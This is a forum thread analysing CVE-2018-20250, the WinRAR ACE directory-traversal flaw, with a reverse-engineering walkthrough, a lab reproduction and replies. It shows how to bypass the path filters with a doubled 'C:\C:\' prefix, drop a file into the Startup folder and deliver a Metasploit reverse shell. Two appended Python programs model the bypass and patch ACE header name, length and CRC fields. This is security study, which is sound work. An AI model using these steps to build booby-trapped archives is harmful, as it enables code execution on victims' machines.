吾爱破解 - LCG - LSG | www.ykwek.com
Views: 7887 | Replies: 101
CVE-2018-20250 vulnerability analysis

Posted by Dustin_Du on 2020-2-15 11:26; last edited by Dustin_Du on 2020-2-15 20:21

Note: the formatting has been adjusted, and the write-up draws on articles by several CSDN users on the same topic.
1. Background
WinRAR is a well-known archiver for Windows: it creates RAR and ZIP archives and unpacks RAR, ZIP and many other formats, and it is one of the most widely used archivers. On 20 February 2019 Check Point Research published a vulnerability in WinRAR that had existed for 19 years and lets an attacker take control of a victim's computer. Their analysis found four flaws in the third-party ACE library unacev2.dll: an ACE path traversal leading to code execution (CVE-2018-20250), an ACE validation bypass (CVE-2018-20251), an out-of-bounds write when handling ACE/RAR files (CVE-2018-20252) and an out-of-bounds write when handling LHA/LZH files (CVE-2018-20253). An attacker who tricks a user into opening a crafted archive with WinRAR can write a file into a system or startup directory, or plant a malicious dll that another program loads, and so run code on the user's machine. China's CNVD rated the series as high risk and on 21 February 2019 assigned CNVD-2019-04911, CNVD-2019-04912, CNVD-2019-04913 and CNVD-2019-04910 to CVE-2018-20250, CVE-2018-20251, CVE-2018-20252 and CVE-2018-20253 respectively, issuing a security bulletin the same day.
2. Vulnerability overview

Check Point's researchers found CVE-2018-20250 while fuzzing WinRAR; the bug had gone unnoticed for 19 years, and with WinRAR's estimated 500 million users the exposure is enormous. The root cause is that WinRAR before 5.70 Beta 1 handles ACE archives through the old third-party dynamic library unacev2.dll, a module last compiled in 2005 without any exploit mitigations (ASLR, DEP and so on). When WinRAR extracts an ACE archive through this library, the file name stored in the archive is not properly filtered, so a crafted name can traverse out of the destination folder and write the file to an arbitrary location such as the system startup folder, which leads to code execution on the victim's machine. Two kinds of software are affected:
  • WinRAR releases before 5.70 Beta 1
  • any other archiver that uses the unacev2.dll library to extract ACE files

According to threat-intelligence reports, besides WinRAR the affected products include Bandizip 6.2.0.0 and earlier, Haozip 5.9.8.10907 and earlier, 2345 Haoya 4.0.0.1170 and 360 Zip, 38 archivers in total. The vendors published fixed versions shortly after disclosure, and a proof of concept has been public for some time. 360's threat team has already seen the bug used in the wild: attackers combine the WinRAR flaw with a malicious archive to deliver Lime-RAT, a remote-access trojan that takes commands from a C&C server, downloads and runs files, monitors the victim's machine, swaps the wallet address during cryptocurrency transactions and carries ransomware functionality, so the danger is considerable.
3. Vulnerability analysis
3.1 Analysis of the unacev2.dll defect

Figure 1: Common archive formats

ACE is a comparatively uncommon archive format. Why does extracting it traverse directories? When an archive is unpacked, the extraction library has to take each member's stored name and the destination folder the user chose and build the path it writes to; in unacev2.dll the stored name first passes through the CleanPath function, which is the directory-traversal filter. If that filter can be bypassed, a member can be written to a location the user never chose, for example the startup folder, where it runs when the computer next starts. To understand how WinRAR uses the library I started from the two exported functions it calls, ACEInitDll (initialisation) and ACEExtract (extraction), and looked at their parameters in IDA. There is no public header for the dll, but searching GitHub turned up the open-source FarManager project, which loads the same dll and declares both functions; its usage matches WinRAR's, and reading the declarations in Source Insight is easier than recovering them from the disassembly. The figures below show the declarations from the FarManager source (only the parts that matter here are shown; the full definitions are in the project).

Figure 2: ACEInitDll declaration

Figure 3: ACEExtract declaration

Of the parameters, the pACEInitDllStruc structure pointer is the one worth noting:

Figure 4: pACEInitDllStruc structure definition

Following the root-cause analysis published by Check Point, I loaded unacev2.dll in IDA and looked at the functions involved: CleanPath, GetDevicePathLen, the WinRAR validators/callbacks and the sprintf that triggers the directory traversal.
3.2 The CleanPath function
Pseudocode of CleanPath:

Figure 5: CleanPath pseudocode

The logic of the pseudocode is:
     1. If the 2nd and 3rd characters of Path are ":\" (a "C:\" prefix), drop the first three characters of Path.
     2. Otherwise, if the 2nd character is ":" and the 3rd is not "\" (a "C:" prefix), drop the first two characters.
     3. Search Path for "..\" and record the hit in PathTraversalPos; if there is none, go to step 7.
     4. If PathTraversalPos is the start of Path (e.g. "..\some_folder\some_file.ext") or the character before it is "\", go to step 5; otherwise go to step 6.
     5. Remove that "..\" from Path, then search Path again for "..\"; if found, go to step 4, otherwise step 7.
     6. Search for "..\" again starting one character after the previous hit; if found, go to step 4, otherwise step 7.
     7. Return Path.

From the pseudocode it is clear that this function only filters the simplest forms: a "C:\" prefix is removed by step 1, a "C:" prefix by step 2, and "\..\" sequences by step 5. Steps 1 and 2 run only once, on the start of the string.

3.3 The GetDevicePathLen function

Pseudocode of GetDevicePathLen:

Figure 6: GetDevicePathLen pseudocode

The logic of the pseudocode is:

     1. If the 1st character of Path is not "\", go to step 7.
     2. If the 2nd character is not "\", go to step 6.
     3. Search for "\" starting at the 3rd character; if there is none, return SlashPos (null, i.e. 0).
     4. Search for "\" starting after SlashPos; if there is none, return SlashPos (0).
     5. Result = SlashPos - Path + 1; go to step 9.
     6. Result = 1; go to step 9.
     7. If the 2nd character is ":", Result = 2.
     8. If the 2nd character was ":" and the 3rd is "\", add 1 to Result (giving 3).
     9. Return Result.

So the function checks whether the file path Path begins with a device or root prefix, and Result is the length of that prefix; Result is 0 when there is none. For example:
  for the path C:\some_folder\some_file.ext the return value is 3;
  for the path \some_folder\some_file.ext it is 1;
  for the path some_folder\some_file.ext it is 0.
3.4 WinRAR validators/callbacks
Pseudocode of the WinRAR validator/callback:

Figure 7: WinRAR validator/callback pseudocode

The values it returns are macro constants; their definitions can be found in the FarManager project:

Figure 8: Macro definitions
The function checks the file path read from the archive (SourceFileName in the pseudocode) and accepts it only if all of the following hold:
1. the first character is not "\" or "/";
2. the name does not start with "..\" or "../";
3. the name contains none of "\..\", "\../", "/../" or "/..\".

3.5 The sprintf that triggers the directory traversal

Figure 9: Location of the traversal sprintf in IDA
Locating the sprintf call in IDA (loc_40CC32, circled in the figure) shows two branches above it, selected by the return value of GetDevicePathLen, which decide the format string:

If GetDevicePathLen returns 0, the destination directory is prepended to the file name:

Otherwise the file name is used on its own:

Once the second branch is taken, sprintf produces the path-traversal bug: the name from the archive is no longer placed under the destination folder but is treated as the absolute path of the file or directory to write.
3.6 Exploitation approach
Having followed the path handling in unacev2.dll, we can lay out the attack as shown in the figure below.

Figure 10: Exploitation approach
Following this approach, we need a stored file name that reaches the vulnerable sprintf with a device prefix still attached, so that the destination folder is dropped and the file lands wherever the name says; the most useful target is the user's startup folder, so that the file runs at the next logon. The pieces fit together as follows:

  • CleanPath removes the leading "C:\" only once, so a name that begins "C:\C:\" comes out of the filter as "C:\...".

  • GetDevicePathLen then sees the surviving "C:\" and returns 3 (non-zero), so the target directory is not prepended and the sprintf builds the traversal path.
  • The WinRAR validator from 3.4 rejects a leading "\" or "/" and explicit "..\" or "../" hops, so the name must avoid those; what it does not check is a drive prefix, and that is exactly what CleanPath leaves behind. The result is an absolute path, which means the attacker has to know where the startup folder is; to drop a file there without knowing the user name we also need to know where WinRAR extracts to.
  • Where the file ends up: WinRAR's "current directory" during extraction.

When WinRAR is started from its installation directory, the "current directory" is:

When the archive is opened by double-clicking it and "Extract" is clicked, WinRAR's "current directory" becomes the folder containing the archive.
If the archive is in the user's Downloads folder, WinRAR's "current directory" is:

If the archive is on the Desktop, the "current directory" is:

Extracting from the Downloads folder, the final path is:


4. Vulnerability verification
Exploiting this vulnerability requires the victim to extract the crafted archive with a vulnerable version, and the attacker cannot know the victim's computer name or user name in advance. A typical case is a user who downloads the archive to the default download folder (C:\Users\Administrator\Downloads) and extracts it there. For the traversal to trigger, the stored file name has to be an absolute path that UNACEV2.DLL passes through, so the attacker has to know the absolute path of the startup folder on the victim's system. Table 1 lists the startup folder paths of different Windows versions. On Win7 and Win10 the path contains the user name, which the attacker can only guess; this verification assumes the account is Administrator, and that is a real limitation of the exploit.

Table 1: Startup folder paths on different systems
Win2003   C:\Documents and Settings\Administrator\「开始」菜单\程序\启动 (Start Menu\Programs\Startup on an English system)
Win2008   C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Win2012   C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Win7      C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Win10     C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

The test was done on Windows 7.
4.1 Fixing the UNACEV2.dll CRC check to trigger the vulnerability
The vulnerability lives in the dynamic library UNACEV2.dll that WinRAR loads to extract ACE files. When UNACEV2.dll processes a file header it verifies the header CRC, so after editing filename in 010 Editor to the traversal path the CRC check fails and hdr_crc has to be repaired as well; the tools used for this are listed in the environment below.

Environment:
  Virtual machine: VMware Workstation 11.0.0
  OS: Windows 7 Home
  WinRAR 5.60: https://www.rarlab.com/rar/winrar-x64-560sc.exe
  Python 3.7.2: https://www.python.org/ftp/python/3.7.2/python-3.7.2-amd64.exe
  010 Editor: https://download.sweetscape.com/010EditorWin64Installer901.exe
  WinACE (to build the ACE sample): https://github.com/360-A-Team/CVE-2018-20250
  EXP: https://github.com/WyAtu/CVE-2018-20250

After installing the tools, the reproduction steps are:
  • Write a simple test bat file; the exploit will drop it into the system startup folder:

  • Use WinACE to compress 1.bat, selecting the "store full path" mode, to obtain 1.ace:

  • Use acefile.py from https://github.com/WyAtu/CVE-2018-20250 to open 1.ace and read its header:

The red boxes mark the fields that have to be changed. Opening 1.ace in 010 Editor shows that the fields are stored little-endian.

The first red box is hdr_crc, here 0xC98C. The second is filename, the stored file path, preceded by 0x001A, the length of filename (26 in decimal).

The third is hdr_size, the header size, here 0x0039 (57). With the target path chosen, the ace file is patched as follows.

Before modification:

After modifying filename:

After modifying the filename length:

After modifying hdr_size:

Opening the file with acefile.py now reports an error, because the header CRC no longer matches; hdr_crc has to be fixed as well:

Use acefile.py to read the header of 1.ace again:

After patching, rename 1.ace to 1.rar (this is not strictly necessary; 1.ace can also be extracted directly).

Choose "Extract to current folder" and extract; the bat file is written to the startup folder:

  • After restarting the computer, the bat file runs automatically:

4.2 Exploitation with msf
msf (Metasploit Framework) is a freely downloadable framework that ships exploits for known software vulnerabilities and makes it easy to obtain, develop and launch attacks against them. Combined with CVE-2018-20250 it turns the simple bat-file drop of 4.1 into a reverse shell, a more dangerous form of attack. The environment:

  Virtual machine: VMware Workstation 11.0.0
  OS 1: Windows 7 Home, IP 192.168.116.147
  OS 2: kali-linux-2018.4-amd64.iso, kernel 4.18.0-kali2-amd64 #1 SMP Debian 4.18.10-2kali1 (2018-10-09) x86_64 GNU/Linux, IP 192.168.116.128

On Kali, generate the backdoor program for the target (the IP address and port used for the connection are set when generating it):

Put the generated shell.exe into an archive with the same header edits as in 4.1, and inspect the header with acefile.py:

Choose "Extract to current folder" on shell.ace; shell.exe is written to the startup folder:

On Kali, start msfconsole and load exploit/multi/handler:

Set the payload, the listening IP address and port, then run exploit:

  • After restarting Windows 7, Kali receives the connection and we have a shell on the target:


5. Reflections
Analysing this vulnerability took several days. The mechanism of the bug is not hard to grasp; what takes time is reading the related code and finding the right functions in IDA, because without the structure definitions the decompiled code is hard to follow, which is why the FarManager source was so useful. The startup folder differs between Windows versions, and WinRAR has released many versions since the vulnerable ones, so the two relatively simple attack methods shown above are mainly of educational value.

Through this vulnerability I learned something about how archivers handle paths, particularly by reading the FarManager source for the functions WinRAR calls. The exploitation here is limited to the most basic method and the study was done in limited time, so parts of the analysis are certainly rough; I hope to learn more in the future.

References
[1] Check Point Research, "Extracting a 19 Year Old Code Execution from WinRAR", https://research.checkpoint.com/extracting-code-execution-from-winrar/
[2] WinRAR directory traversal vulnerability reproduction (CVE-2018-20250), https://mp.weixin.qq.com/s/KbDliC2e0_bkFFur4nx-LQ
[3] WinRAR vulnerability CVE-2018-20250 analysis, https://www.52bug.cn/hkjs/5732.html
[4] CVE-2018-20250 WinRAR, https://www.cnblogs.com/threesoil/p/10534280.html
[5] [CVE-2018-20250] WinRAR vulnerability reproduction notes, https://www.landui.com/help/show-9239
[6] [Vulnerability reproduction] WinRAR directory traversal CVE-2018-20250, https://www.cnblogs.com/fox-yu/p/10495236.html
[7] Using a Metasploit backdoor to penetrate Windows 7, https://www.myhack58.com/Article/html/3/8/2015/65031.htm
[8] Successfully exploiting the 19-year-old WinRAR code execution flaw, https://www.360zhijia.com/anquan/444960.html
[9] FarManager project, https://github.com/FarGroup/FarManager
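The path handling from 3.2 to 3.6, as one runnable Python model added to this thread (it is not code from unacev2.dll, WinRAR, Check Point or the exploit repositories). It reimplements CleanPath, GetDevicePathLen, the WinRAR validator and the format-string choice from the pseudocode steps above so the doubled "C:\C:\" prefix bypass can be traced without a debugger. The corner cases the steps do not spell out are assumptions: UNC names, step 5 being modelled as deleting the matched "..\" hop, the exact format strings ("%s%s" versus "%s"), a destination folder that already ends in "\", and the validator running before CleanPath. The drive-relative case in the demo additionally relies on Windows resolving a "C:name" path against the current directory of drive C:, which is what the current-directory discussion in 3.6 is about.

```python
"""Model of the unacev2.dll / WinRAR path handling described in 3.2-3.6.

Added example: not the real decompiled code, a reimplementation of the
pseudocode steps in the post so the filter pipeline can be exercised offline.
"""

# Sequences the WinRAR callback (3.4) refuses anywhere in the name.
VALIDATOR_FORBIDDEN = ("\\..\\", "\\../", "/../", "/..\\")


def winrar_validator(name: str) -> bool:
    """3.4: reject rooted names and explicit '..' hops; drive prefixes pass."""
    if not name or name[0] in "\\/":
        return False
    if name.startswith("..\\") or name.startswith("../"):
        return False
    return not any(bad in name for bad in VALIDATOR_FORBIDDEN)


def clean_path(path: str) -> str:
    """3.2 CleanPath: strip ONE drive prefix, then '..\\' hops (modelled)."""
    if len(path) > 2 and path[1] == ":" and path[2] == "\\":
        path = path[3:]                      # step 1: "C:\" prefix dropped
    elif len(path) > 1 and path[1] == ":":
        path = path[2:]                      # step 2: "C:" prefix dropped
    search_from = 0
    while True:
        pos = path.find("..\\", search_from)  # step 3
        if pos == -1:
            return path                      # step 7
        if pos == 0 or path[pos - 1] == "\\":  # step 4
            path = path[:pos] + path[pos + 3:]  # step 5 (assumption: the hop itself is removed)
            search_from = 0
        else:
            search_from = pos + 1            # step 6: e.g. "a..\b" is left alone


def get_device_path_len(path: str) -> int:
    """3.3 GetDevicePathLen: length of the device/root prefix, 0 if none."""
    if not path.startswith("\\"):                          # step 1 -> 7
        if len(path) > 1 and path[1] == ":":
            return 3 if len(path) > 2 and path[2] == "\\" else 2   # steps 7-8
        return 0
    if len(path) < 2 or path[1] != "\\":
        return 1                                           # step 6: "\folder"
    first = path.find("\\", 2)                             # step 3: "\\server"
    if first == -1:
        return 0
    second = path.find("\\", first + 1)                    # step 4: "\share\"
    if second == -1:
        return 0
    return second + 1                                      # step 5


def output_path(dest_dir: str, name: str) -> str:
    """3.5: '%s%s' (destination + name) only when no device prefix survived."""
    if get_device_path_len(name) == 0:
        return dest_dir + name
    return name                                            # '%s': name used as-is


def trace_extraction(dest_dir: str, archived_name: str) -> dict:
    """Run validator -> CleanPath -> GetDevicePathLen -> sprintf for one member."""
    ok = winrar_validator(archived_name)
    cleaned = clean_path(archived_name) if ok else None
    devlen = get_device_path_len(cleaned) if ok else None
    final = output_path(dest_dir, cleaned) if ok else None
    return {"validator_ok": ok, "cleaned": cleaned,
            "device_len": devlen, "final": final}


if __name__ == "__main__":
    # Constructed inputs: the default download folder and the Win7 Startup path from Table 1.
    dest = "C:\\Users\\Administrator\\Downloads\\"
    startup = ("Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\"
               "Start Menu\\Programs\\Startup\\1.bat")
    cases = (
        "some_folder\\1.bat",        # ordinary member: lands under dest
        "..\\" + startup,            # rejected by the validator
        "C:\\" + startup,            # single prefix stripped: harmless relative name
        "C:\\C:\\" + startup,        # doubled prefix: "C:\" survives, absolute write
        "C:\\C:../AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.bat",
        # last case: "C:../..." is drive-relative; Windows resolves it against the
        # current directory of C: (the archive's folder, per 3.6), so no user name is needed
    )
    for name in cases:
        print(name, "->", trace_extraction(dest, name))
```

Run it to see the cases side by side: a plain name under the destination, a single "C:\" prefix that CleanPath reduces to a harmless relative name, the doubled prefix that reaches the sprintf with "C:\" intact, and the drive-relative form that, with the archive opened from Downloads, turns a "../AppData" hop into the user's own Startup folder.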

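The header surgery from 4.1 (new filename, filename_size, hdr_size, hdr_crc), as an added Python example for this thread rather than code from WinACE, acefile.py or the exploit repositories. The record layout follows the ACE file header as the field names and offsets in the post show (a 26-byte name giving hdr_size 0x39 is reproduced). Two things are assumptions: the CRC convention (a CRC-32 with no final inversion, low 16 bits, over the hdr_size bytes that follow the 4-byte crc/size prefix), which is what acefile.py checks against, and a header without a comment field. The sample record is constructed; it is not a complete archive, so there is no main header and no packed data beyond a placeholder.

```python
"""Patch the stored file name in an ACE file header and repair the
length and CRC fields, the edits made by hand with 010 Editor in 4.1.

Added example, not code from WinACE or acefile.py. Layout and CRC
convention are assumptions described in the lead-in.
"""
import struct
import zlib

# hdr_crc, hdr_size, hdr_type, hdr_flags, packsize, origsize, datetime,
# attribs, crc32, comptype, compqual, params, reserved1, filename_size
FIXED_FMT = "<HHBHIIIIIBBHHH"
FIXED_LEN = struct.calcsize(FIXED_FMT)   # 35 bytes before the variable-length name
HDR_TYPE_FILE = 1
FLAG_ADDSIZE = 0x0001                    # packed data follows the header


def ace_crc16(data: bytes) -> int:
    """ACE header CRC (assumed): CRC-32, init 0xFFFFFFFF, no final XOR, low 16 bits."""
    return (zlib.crc32(data) ^ 0xFFFFFFFF) & 0xFFFF


def build_file_header(filename: bytes, packsize: int = 0, origsize: int = 0) -> bytes:
    """Construct a self-consistent file header for a stored member (constructed sample)."""
    body = struct.pack("<BHIIIIIBBHHH", HDR_TYPE_FILE, FLAG_ADDSIZE,
                       packsize, origsize, 0, 0x20, 0, 0, 0, 0, 0, len(filename))
    body += filename
    return struct.pack("<HH", ace_crc16(body), len(body)) + body


def parse_file_header(record: bytes) -> dict:
    """Parse one record and verify hdr_crc / hdr_size; raise ValueError if inconsistent."""
    fields = struct.unpack(FIXED_FMT, record[:FIXED_LEN])
    hdr_crc, hdr_size, hdr_type = fields[0], fields[1], fields[2]
    filename_size = fields[-1]
    body = record[4:4 + hdr_size]            # everything hdr_crc covers
    if len(body) != hdr_size:
        raise ValueError("truncated header")
    if ace_crc16(body) != hdr_crc:
        raise ValueError(f"hdr_crc mismatch: stored {hdr_crc:#06x}, computed {ace_crc16(body):#06x}")
    if FIXED_LEN - 4 + filename_size != hdr_size:
        raise ValueError("filename_size disagrees with hdr_size")
    filename = record[FIXED_LEN:FIXED_LEN + filename_size]
    return {"hdr_crc": hdr_crc, "hdr_size": hdr_size, "hdr_type": hdr_type,
            "filename_size": filename_size, "filename": filename}


def patch_filename(record: bytes, new_name: bytes) -> bytes:
    """Replace the stored name and fix filename_size, hdr_size and hdr_crc in that order."""
    old = parse_file_header(record)                   # refuse to patch a broken header
    fixed = bytearray(record[:FIXED_LEN])
    struct.pack_into("<H", fixed, FIXED_LEN - 2, len(new_name))  # filename_size
    body = bytes(fixed[4:]) + new_name
    struct.pack_into("<H", fixed, 2, len(body))                  # hdr_size
    struct.pack_into("<H", fixed, 0, ace_crc16(body))            # hdr_crc last
    tail = record[4 + old["hdr_size"]:]               # packed data after the header, untouched
    return bytes(fixed) + new_name + tail


if __name__ == "__main__":
    # Constructed: a member called 1.bat with 3 bytes of "packed" data.
    original = build_file_header(b"1.bat", packsize=3, origsize=3) + b"abc"
    print("before:", parse_file_header(original))
    # Traversal name from 3.6 / Table 1 (Win7, user name assumed to be Administrator).
    target = (b"C:\\C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\"
              b"Start Menu\\Programs\\Startup\\1.bat")
    patched = patch_filename(original, target)
    print("after: ", parse_file_header(patched))
```

parse_file_header is the check acefile.py performs on a real 1.ace; run it on the bytes at the first file-header offset of the archive and compare with acefile.py's output. If the CRC convention assumed here were wrong, a record built by this code would still be self-consistent but acefile.py would reject it, which is exactly the error the post hits before fixing hdr_crc.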
Reply from 人间 (2020-3-8 15:27), answered by Dustin_Du (2020-3-11 11:41):
Thank you for the article.
give you the heart♥

4#
_ posted 2020-2-15 18:07
5#
posted 2020-2-15 18:31
Thanks for sharing, support. The forum is reproducing the vulnerability; I'll give it a try in a while.
6#
chenjingyes posted 2020-2-15 21:22
Thanks for sharing, support.
7#
allen-love posted 2020-2-15 22:13
Nice, something to learn from.
8#
Hmily posted 2020-2-15 23:14
@Dustin_Du Is this original work?
9#
Dustin_Du (OP) posted 2020-2-15 23:20

A while ago I studied some material and tried to reproduce this vulnerability myself, and wrote it up as this post.

Comment by Hmily, posted 2020-2-16 00:05: Looking forward to more.
10#
gengshuai posted 2020-2-16 10:20
Thanks, a newbie will give it a try.
11#
Ontheroad02 posted 2020-2-16 10:30
Thanks for sharing.
